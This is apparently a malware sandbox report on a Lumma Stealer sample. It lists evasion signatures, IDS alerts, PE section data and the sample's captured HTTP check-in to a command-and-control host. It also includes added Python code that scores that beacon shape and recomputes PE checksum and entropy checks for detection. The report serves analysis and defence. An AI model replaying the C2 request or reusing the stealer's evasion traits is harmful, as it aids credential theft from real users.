Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561682
MD5: 64f25a20bc6a8730e6d230e5d63dac8e
SHA1: f1c8a90fefc9e7789013cf9228827634ad8410f3
SHA256: daa2f6c445600573a591de7b8ad352699dcc9ff8b5bd2e1a6f93dc373572ceae
Tags: exe, user-Bitsight

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6444, cmdline: "C:\Users\user\Desktop\file.exe", MD5: 64F25A20BC6A8730E6D230E5D63DAC8E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Suricata Overview

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T04:20:24.488324+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49709 | 104.21.33.116 | 443 | TCP
2024-11-24T04:20:26.779861+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49715 | 104.21.33.116 | 443 | TCP
2024-11-24T04:20:25.409417+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49709 | 104.21.33.116 | 443 | TCP
2024-11-24T04:20:25.409417+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49709 | 104.21.33.116 | 443 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | Virustotal: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [eax], bl | 1_2_0058CF05
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh | 1_2_005BC040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh | 1_2_005BC040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h | 1_2_005BC040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh | 1_2_005BC040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax | 1_2_005BB860
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov ecx, eax | 1_2_0058C02B
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h] | 1_2_0058E0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax | 1_2_005BF8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edi, eax | 1_2_005BF8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+14h] | 1_2_005898F0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, eax | 1_2_005BB8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx | 1_2_005BB8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+14h] | 1_2_0058E970
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [esi], cx | 1_2_0058EA38
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h] | 1_2_0058E35B
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h | 1_2_005BBCE0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx | 1_2_0058BC9D
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp | 1_2_00585C90
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp | 1_2_00585C90
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [esi], cl | 1_2_005A8CB0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] | 1_2_0058AD00
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [edi] | 1_2_005A5E90
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch] | 1_2_005C0F60
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h] | 1_2_005877D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax | 1_2_005877D0

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49709 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49709 -> 104.21.33.116:443
Source: Joe Sandbox View | IP Address: 104.21.33.116
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 104.21.33.116:443
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: property-imper.sbs
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: property-imper.sbs
Source: unknown | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: property-imper.sbs
Source: file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1407874228.0000000001119000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1402955652.000000000116D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1446968605.000000000111A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/
Source: file.exe, 00000001.00000002.1447078609.000000000116F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1404016851.0000000001185000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1402955652.000000000116D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447104795.0000000001185000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/api
Source: file.exe, 00000001.00000002.1447078609.000000000116F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1402955652.000000000116D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/api6
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49709 version: TLS 1.2
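The check-in above has a recognisable shape even without the domain: a POST to /api with an 8-byte form-encoded body, a Chrome user agent sent by a process that is not a browser, and a TLS client whose JA3 Suricata rates only as severity 3 "Possible Malware". The following triage function is an added example, not Joe Sandbox code: it scores HTTP/TLS records against that shape. The record layout, the list of browser processes and the weights are assumptions; the JA3 value and the C2 host are the ones this report lists, and the sample records are constructed.

```python
"""Score HTTP records for the Lumma Stealer check-in shape seen in this report.
Added example, not Joe Sandbox code. Record layout, weights and the list of
browser processes are assumptions; the indicator values come from the report."""
from dataclasses import dataclass

# Values taken from the report: JA3 of the sample's TLS client and the C2 host.
REPORTED_JA3 = "a0e9f5d64349fb13191bc781f81f42e1"
REPORTED_C2_HOST = "property-imper.sbs"

# Assumption: image names that legitimately send a Chrome-style User-Agent.
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe"}

# Assumption: weights. A JA3 hit alone is weak (Suricata rates SID 2028371 as
# severity 3), so it contributes little; the known host alone is decisive.
WEIGHTS = {"post_api": 2, "tiny_form_body": 2, "browser_ua_non_browser": 3,
           "ja3_match": 1, "known_c2_host": 5}
THRESHOLD = 5


@dataclass
class HttpRecord:
    process: str   # image name of the sending process (from the sandbox/EDR)
    ja3: str       # JA3 hash of the TLS ClientHello carrying this request
    raw: str       # request line plus headers, as captured


def parse_http_request(raw: str) -> dict:
    """Split a captured request head into method, path and a lower-cased header map."""
    lines = [ln for ln in raw.replace("\r\n", "\n").split("\n") if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def score_checkin(rec: HttpRecord) -> "tuple[int, list[str]]":
    """Return (score, reasons). Each reason names one matched feature."""
    req = parse_http_request(rec.raw)
    h = req["headers"]
    score, reasons = 0, []

    def hit(key: str, why: str) -> None:
        nonlocal score
        score += WEIGHTS[key]
        reasons.append(why)

    if req["method"] == "POST" and req["path"] == "/api":
        hit("post_api", "POST /api")
    try:
        clen = int(h.get("content-length", "-1"))
    except ValueError:
        clen = -1
    if h.get("content-type", "").startswith("application/x-www-form-urlencoded") and 0 <= clen <= 16:
        hit("tiny_form_body", f"form-encoded body of only {clen} bytes")
    if "Chrome/" in h.get("user-agent", "") and rec.process.lower() not in BROWSER_PROCESSES:
        hit("browser_ua_non_browser", f"Chrome User-Agent sent by {rec.process}")
    if rec.ja3.lower() == REPORTED_JA3:
        hit("ja3_match", "JA3 matches the fingerprint in this report")
    if h.get("host", "").lower() == REPORTED_C2_HOST:
        hit("known_c2_host", f"Host header is known C2 {REPORTED_C2_HOST}")
    return score, reasons


def is_lumma_checkin(rec: HttpRecord) -> bool:
    return score_checkin(rec)[0] >= THRESHOLD


# Constructed records: the first reproduces the request captured in the report,
# the second has the same shape against an unknown host, the third is benign.
SAMPLE_CHECKIN = HttpRecord("file.exe", REPORTED_JA3,
    "POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    "Content-Length: 8\r\nHost: property-imper.sbs\r\n")
SAME_SHAPE_NEW_HOST = HttpRecord("file.exe", "0" * 32,
    SAMPLE_CHECKIN.raw.replace("property-imper.sbs", "unknown.example"))
BENIGN_BROWSER = HttpRecord("chrome.exe", "0" * 32,
    "POST /login HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 Chrome/119.0.0.0 Safari/537.36\r\n"
    "Content-Length: 412\r\nHost: www.example\r\n")

if __name__ == "__main__":
    for rec in (SAMPLE_CHECKIN, SAME_SHAPE_NEW_HOST, BENIGN_BROWSER):
        print(rec.process, score_checkin(rec))
```

The second constructed record is the point of the exercise: with the host swapped and the JA3 changed it still scores 7, so the beacon shape (tiny form POST to /api from a non-browser carrying a browser UA) catches the next domain before an IOC feed does, while the benign browser POST scores 0.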

System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005B9030
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005889A0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0058CF05
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00584040
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00586840
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005BC040
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0065D878
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0058E0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005BF8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005898F0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005BB8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0062A095
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0058E970
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0066793F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00744105
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_006CC9ED
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005B41D0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005861A0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00589210
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0058B210
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00584AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007422C5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0059FB60
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0059DB30
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00582B80
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005894D0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00586CC0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005B24E0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00585C90
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005C0C80
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005A8CB0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005A3D70
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0058AD00
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00599530
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00752DE2
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00583580
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005C1580
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074DD87
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005A0650
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005A7E20
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005A5E90
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005A8770
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005C0F60
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0073D727
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0063F70A
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005877D0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005827D0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007457BC
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005A1790
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005BC780
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005B87B0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: (empty) ZLIB complexity 0.9992955942622951
Source: file.exe | Static PE information: Section: olszqzdv ZLIB complexity 0.9941287265839172
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instr diversity: 0.5
Source: classification engine | Classification label: mal100.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005B27B0 CoCreateInstance | 1_2_005B27B0
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | Virustotal: Detection: 50%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: file.exe | Static file information: File size 1852416 > 1048576
Source: file.exe | Static PE information: Raw size of olszqzdv is bigger than: 0x100000 < 0x19a600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 1.2.file.exe.580000.0.unpack | section rights in memory: (empty):EW; .rsrc:W; .idata:W; (empty):EW; olszqzdv:EW; iwdrpyuy:EW; .taggant:EW | vs original file: (empty):ER; .rsrc:W; .idata:W; (empty):EW; olszqzdv:EW; iwdrpyuy:EW; .taggant:EW
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cbb36 should be: 0x1d081d
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: olszqzdv
Source: file.exe | Static PE information: section name: iwdrpyuy
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007EE07D push 3BF92469h; mov dword ptr [esp], edx | 1_2_007EE09B
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00832886 push 4D5CF923h; mov dword ptr [esp], edi | 1_2_00832903
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00595057 push eax; iretd | 1_2_00595058
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00817891 push 1C7AF24Fh; mov dword ptr [esp], eax | 1_2_00817997
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00817891 push 3B42EED2h; mov dword ptr [esp], edi | 1_2_008179BE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00817891 push ebx; mov dword ptr [esp], edx | 1_2_008179F4
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00817891 push 46AEB2E6h; mov dword ptr [esp], eax | 1_2_00817A74
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0065D878 push 2A5D5A00h; mov dword ptr [esp], edx | 1_2_0065D89F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0065D878 push 6F2BA921h; mov dword ptr [esp], edx | 1_2_0065D8E8
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0065D878 push ecx; mov dword ptr [esp], 628D8CC0h | 1_2_0065D920
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0065D878 push 6B9553FBh; mov dword ptr [esp], edx | 1_2_0065DA56
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0065D878 push esi; mov dword ptr [esp], 76FF5BDDh | 1_2_0065DA5B
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0078505F push edi; mov dword ptr [esp], ebp | 1_2_0078516C
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0078505F push 3C8CB3D1h; mov dword ptr [esp], eax | 1_2_007851A5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0078505F push 0E7CAE1Eh; mov dword ptr [esp], ebp | 1_2_007851AF
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F6035 push 551F4F78h; mov dword ptr [esp], edx | 1_2_007F6064
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push 5D3A2AB9h; mov dword ptr [esp], ecx | 1_2_0074A8BE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push 6269E27Ah; mov dword ptr [esp], ecx | 1_2_0074A922
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push ebx; mov dword ptr [esp], edx | 1_2_0074AA0B
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push esi; mov dword ptr [esp], ebp | 1_2_0074AA27
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push eax; mov dword ptr [esp], 3B657B95h | 1_2_0074ABAA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push eax; mov dword ptr [esp], 57E9053Bh | 1_2_0074AC6F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push eax; mov dword ptr [esp], 57EFF231h | 1_2_0074ACB7
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push edi; mov dword ptr [esp], ebx | 1_2_0074AD67
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push 35F0471Bh; mov dword ptr [esp], ecx | 1_2_0074ADC1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push ebp; mov dword ptr [esp], esi | 1_2_0074ADCE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push esi; mov dword ptr [esp], 671D122Dh | 1_2_0074ADD3
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push 23177867h; mov dword ptr [esp], esi | 1_2_0074ADF1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push ecx; mov dword ptr [esp], 2BD2E100h | 1_2_0074AE48
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push ebp; mov dword ptr [esp], edx | 1_2_0074AEC5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074A83B push esi; mov dword ptr [esp], edi | 1_2_0074AF0B
Source: file.exe | Static PE information: section name: (empty) entropy: 7.981115903907639
Source: file.exe | Static PE information: section name: olszqzdv entropy: 7.953205529312231
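The static findings in this section (a checksum that does not match, two sections with entropy close to 8, an entry point in .taggant, and sections mapped writable and executable) are all cheap to recompute yourself before trusting a sandbox verdict. The block below is an added example, not Joe Sandbox code: it implements those checks with the standard library only, using the same CheckSum algorithm as CheckSumMappedFile, byte entropy, and a walk over the section table. The section table it runs on is constructed from this report's section names and rights; the virtual addresses, sizes and the entry point RVA are assumed.

```python
"""Standard-library PE triage for the findings in this section.
Added example, not Joe Sandbox code. Section names/rights mirror this report;
virtual addresses, sizes and the entry point below are assumed."""
import math
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT"}


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE CheckSum as computed by CheckSumMappedFile: carry-folded 32-bit sum of
    every dword except the CheckSum field itself, folded to 16 bits, plus the
    file length. checksum_offset is e_lfanew + 4 + 20 + 64 (PE32 and PE32+)."""
    skip = checksum_offset & ~3
    total = 0
    for off in range(0, len(data), 4):
        if off == skip:
            continue
        chunk = data[off:off + 4].ljust(4, b"\0")   # pad a trailing partial dword
        total += struct.unpack("<I", chunk)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = total + (total >> 16)
    return (total & 0xFFFF) + len(data)


def verify_checksum(data: bytes, checksum_offset: int) -> "tuple[int, int]":
    """Return (stored, computed). The report's 'real checksum 0x1cbb36 should be
    0x1d081d' is exactly this pair; packers rarely bother to fix the field."""
    stored = struct.unpack_from("<I", data, checksum_offset)[0]
    return stored, pe_checksum(data, checksum_offset)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 to 8.0. The report's 7.98 / 7.95 is indistinguishable
    from compressed or encrypted data, i.e. a packed payload."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage_sections(sections, entry_point_rva: int) -> "list[str]":
    """sections: (name, virtual_address, virtual_size, characteristics) tuples.
    Emits findings in the wording this report uses."""
    findings, ep_section = [], None
    for name, va, vsize, chars in sections:
        if va <= entry_point_rva < va + vsize:
            ep_section = name
        if name == "":
            findings.append("unnamed section")
        elif name not in STANDARD_SECTIONS:
            findings.append(f"section with non-standard name: {name}")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"writable and executable section: {name or '(unnamed)'}")
    if ep_section is None:
        findings.append("entry point outside every section")
    elif ep_section not in STANDARD_SECTIONS:
        findings.append(f"entry point lies outside standard sections: {ep_section or '(unnamed)'}")
    return findings


# Constructed section table: names and E/R/W rights as listed in this report
# for the original file; addresses and sizes are assumed. EW = execute+write.
ER = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
W = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ
EW = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ
REPORT_SECTIONS = [
    ("",         0x001000, 0x008000, ER),
    (".rsrc",    0x009000, 0x001000, W),
    (".idata",   0x00A000, 0x001000, W),
    ("",         0x00B000, 0x100000, EW),
    ("olszqzdv", 0x10B000, 0x19A600, EW),   # raw size 0x19a600 per the report
    ("iwdrpyuy", 0x2A6000, 0x001000, EW),
    (".taggant", 0x2A7000, 0x001000, EW),
]
ASSUMED_ENTRY_POINT = 0x2A7100   # placed inside .taggant, as the report states

if __name__ == "__main__":
    for finding in triage_sections(REPORT_SECTIONS, ASSUMED_ENTRY_POINT):
        print(finding)
```

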